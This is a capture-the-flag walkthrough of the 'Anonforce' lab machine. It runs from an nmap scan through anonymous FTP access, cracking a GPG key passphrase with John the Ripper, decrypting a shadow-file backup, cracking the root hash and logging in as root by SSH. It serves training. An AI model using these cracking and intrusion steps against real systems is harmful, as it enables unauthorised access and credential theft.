Anonforce
Phase 1: Reconnaissance (Information Gathering)
export TARGET_IP=10.10.178.7
nmap -p- --min-rate 5000 $TARGET_IP
Not shown: 65392 closed tcp ports (reset), 141 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
Phase 2: Enumeration and Vulnerability Analysis
Based on the reconnaissance, we focus on the open services to identify potential vulnerabilities.
-
FTP Enumeration:
-
Command:
ftp 10.10.178.7 21
-
Explanation: Attempts to connect to the FTP server on the target.
-
Interaction and Results (Annotated):
# Connected to 10.10.178.7.
# 220 (vsFTPd 3.0.3) <-- Banner reveals the FTP server software and version.
Name (10.10.178.7:kali): anonymous # Attempting anonymous login.
# 331 Please specify the password.
Password: # BLANK <-- Entering a blank password.
# 230 Login successful. <-- Anonymous login is permitted! This is a major vulnerability.
# Remote system type is UNIX.
# Using binary mode to transfer files.
ftp> help # Displays available FTP commands.
ftp> ls # Lists files in the current directory.
ftp> cd /home/melodias # Navigates to user "melodias" home directory.
ftp> get user.txt # Downloads a file named "user.txt".
ftp> cd /notread # Navigates to the directory named "notread".
ftp> ls # Lists files-rwxrwxrwx 1 1000 1000 524 Aug 11 2019 backup.pgp
-rwxrwxrwx 1 1000 1000 3762 Aug 11 2019 private.asc -
Analysis:
- Anonymous FTP Access: The most critical finding is that anonymous FTP access is enabled, allowing anyone to connect and browse (and potentially modify) files.
- Sensitive Files: The
backup.pgp
andprivate.asc
files are discovered. The.pgp
extension suggests an encrypted file (likely using PGP or GPG), and the.asc
extension often indicates an ASCII-armored key file (likely a private key). The file permissions (-rwxrwxrwx
) are overly permissive, allowing any user (including the anonymous FTP user) to read, write, and execute these files. This is another significant security flaw.
-
Phase 3: Exploitation
Decrypting the Backup:
-
Strategy: We have an encrypted file (
backup.pgp
) and what appears to be a private key (private.asc
). We'll attempt to decrypt the backup using the private key. -
Steps (Annotated):
gpg --import private.asc # Imports the private key into the GPG keyring.
# GPG will prompt for a passphrase if the key is protected.- Passphrase Cracking: Often, private keys are protected with a passphrase. If the import fails or prompts for a password, we need to crack it.
gpg2john private.asc > hash # Extracts the password hash from the private key file.
# `gpg2john` is a tool from the John the Ripper suite.
john hash --wordlist=/usr/share/wordlists/rockyou.txt # Attempts to crack the hash.
# Output: xbox360 (This indicates the cracked passphrase)
gpg --import private.asc # Re-import the key, this time providing the passphrase.
# Enter "xbox360" when prompted.
gpg --decrypt backup.pgp # Attempts to decrypt the backup.pgp file.
# Enter "xbox360" again when prompted.
-
Gaining Root Access:
-
backup.pgp
is a/etc/shadow
file. -
Steps:
# backup.pgp, once decrypted, will contain the shadow hash for root.
echo -e 'root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::' > roothash
# Create new file called roothash.
john roothash --wordlist=/usr/share/wordlists/rockyou.txt # Attempt to crack the root password hash.
# Output: hikari (This indicates the cracked password)
ssh root@$TARGET_IP # Connect to the target as root via SSH.
# Enter "hikari" as the password.
id # Verify root access. Output should be: uid=0(root) gid=0(root) groups=0(root)
-